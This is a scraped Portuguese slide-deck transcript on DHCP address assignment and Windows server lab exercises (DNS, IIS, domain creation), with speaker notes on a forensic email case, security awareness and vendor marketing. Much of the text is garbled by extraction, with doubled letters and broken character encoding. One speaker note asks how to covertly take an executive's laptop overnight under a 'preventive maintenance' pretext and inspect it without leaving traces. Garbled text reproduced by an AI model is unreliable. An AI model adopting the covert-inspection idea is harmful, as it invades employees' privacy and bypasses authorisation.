  • 257. Processo de Atribuição ¨ 1) O cliente envia a mensagem DDhhccppddiissccoovveerr eemm bbrrooaaddccaasstt.. – O endereço IP de origem do pacote ĂŠ 0.0.0.0 pois o cliente ainda nĂŁo tem um endereço IP. ¨ 2) Quando o servidor recebe o pacote, ele seleciona um endereço IP disponĂ­vel na sua lista e oferece ao cliente. – O servidor responde ao cliente com a mensagem Dhcpoffer ¨ 33)) QQuuaannddoo oo cclliieennttee rreecceebbee aa ooffeerrttaa eellee ppooddee:: – aceitar enviando a mensagem Dhcprequest (incluindo o IP) em broadcast – recusar enviando a mensagem Dhcpdecline em broadcast ¨ 44)) QQuuaannddoo oo sseerrvviiddoorr rreecceebbee oo DDhhccpprreeqquueesstt eellee ppooddee:: – confirmar para o cliente com a mensagem Dhcpack – recusar, se o endereço foi usado por outro, com a mensagem Dhcpnack ¨ 5) O cliente pode liberar um endereço com a mensagem Dhcprelease.
  • 258. Observaçþes ¨ 1) O cliente aceita a primeira oferta que receber. – Se houver mais de um servidor DHCP distribuindo endereços IP, nĂŁo haverĂĄ como selecionar apenas um deles. ¨ 2) O direito do cliente de usar o endereço IP recebido pelo servidor DHCP ĂŠ temporĂĄrio. – Quando o prazo de validade do IP expira, o servidor pode atribuĂ­-lo a outra estação na rede. – O cliente pode liberĂĄ-lo antecipadamente com a mensagem Dhcprelease
  • 259. Observaçþes ¨ 3) Se o cliente nĂŁo receber a oferta do servidor: – Ele repete o pedido em intervalos de 2, 4, 8, 16 segundos. – Se as 4 tentativas fracassarem, ele tenta novamente em intervalos de 5 minutos. ¨ 4) Quando o cliente ĂŠ reinicializado, ele tenta utilizar o mesmo IP que tinha anteriormente. – Ele envia o pacote Dhcprequest com o endereço IP antigo ao invĂŠs do Dhcpdiscover. – Se o pedido ĂŠ negado, entĂŁo o cliente envia um Dhcpdiscover.
  • 260. Processo de Atribuição: Outras Vezes Cliente DHCP ESCOPO Servidor DHCP Dhcprequest 200.17.98.1 Dhcpack 200.17.98.1 TTooddaass aass mmeennssaaggeennss ssĂŁĂŁoo eennvviiaaddaass eemm bbrrooaaddccaasstt 255.255.255.0 200.17.98.23 72 horas 200.17.98.1 … 200.17.98.254 OU Dhcpnack Dhcpdiscover …
  • 261. Consideraçþes sobre o Planejamento da Implementação do DHCP ¨ Para redes nĂŁo segmentadas: – Um Ăşnico servidor DHCP pode atender atĂŠ 10000 clientes (estimativa). ¨ Para redes segmentadas: – Se os roteadores sĂŁo compatĂ­veis com a RFC1542 • Um Ăşnico servidor DHCP ĂŠ suficiente. – Se os roteadores nĂŁo sĂŁo compatĂ­veis com a RFC1542 • Deve-se utilizar um servidor DHCP para cada rede. ¨ Computadores que se ligam temporariamente na rede (notebooks, por exemplo) devem receber IPs com tempo de “leasing” curto.
  • 262. Posicionando Servidores DHCP Roteador RFC 1542 compatĂ­vel Agente relay DHCP/BOO TP Servidor DHCP 1 Roteador nĂŁo RFC 1542 compatĂ­vel Servidor DHCP 2
  • 263. PrĂĄtica: DHCP ¨Instalar e configurar o DHCP; ¨Criar Escopo ¨Áreas de exclusĂľes ¨Definir arquivos por MAC ADDRESS 263
  • 265. PrĂĄtica: Instalação de Serviços ¨DNS ¨Terminal Service ¨Wins 265
  • 267. PrĂĄtica : Instalando o IIS ¨Instalando e configurando ¨Disponibilizando um site ¨Configurando o DNS 267
  • 270. PrĂĄtica: Criação de DomĂ­nio ¨Instalar e configurar o dominio; ¨Criar usuĂĄrios ¨Compartilhamento de arquivos ¨Definição de segurança com o GPO 270
  • 272. PrĂĄtica: Criar DomĂ­nio ¨Iniciar / Executar / dcpromo 272

Hinweis der Redaktion

  1. Caso: Uma funcionåria estava sendo caluniada atravÊs de emails sendo enviados por provedores externos. Esses emails tinham como remetente o próprio nome da funcionåria@webmail.com, o que supostamente indicava que ela mesma enviava as mensagens. Problema: Essa funcionåria não tinha um bom relacionamento com o restante da equipe, logo todos eram suspeitos da armação. Solução: Com nossas ferramentas e equipamentos fizemos uma pesquisa nas måquinas do departamento para identificar quem havia acessado o email funcionåria@webmail.com. Resultado: Em 20 minutos conseguimos identificar quem havia acessado tal email e descobrimos o verdadeiro envolvido. Conseguimos recuperar desde a criação do email atÊ as mensagens que haviam sido enviadas
  2. Algumas empresas partem do princípio que seus profissionais são corretos em postura e ações, e que são qualificados e éticos. Essa pesquisa da PWC mostra que os maiores fraudadores estão em cargos de confiança. Como fazer para rastrear essas figuras dentre seus colaboradores?! Como pegar o notebook de um diretor da empresa para fazer “manutenção preventiva” durante a noite?! Como executar o trabalho sem que ocorram indicios de inspeção não autorizada?
  3. Não adianta colocar um micro dentro de um cofre e deixar relatórios sensíveis em cima da mesa. Ressaltar Funcionårios insatisfeitos e divulgação de senhas.
  4. Enfatizar falta de conscientização dos usuårios e dos executivos.
  5. Security is not an &amp;quot;add-on&amp;quot; nor an option it is part of the &amp;quot;intelligent information network DNA&amp;quot;. Like security is built into cars these days, it is integrated to allow you to focus on what you have bought a car for and not on securing the car…. Imagine you would need to look for an airbag vendor, an ABS supplier and think how to integrate these components… Yes, that would be a nightmare and many unsecured cars would be driven on our streets hence putting at higher risk all drivers. We don&amp;apos;t want to offer network nor security that way, it must be integrated and part of a comprehensive system! create explicit trust between the secured endpoints and the secured infrastructure build a systems-based infrastructure with pervasive security all throughout all network&amp;apos;s layers to offer a less complex and more secure environment to optimize business apps and processes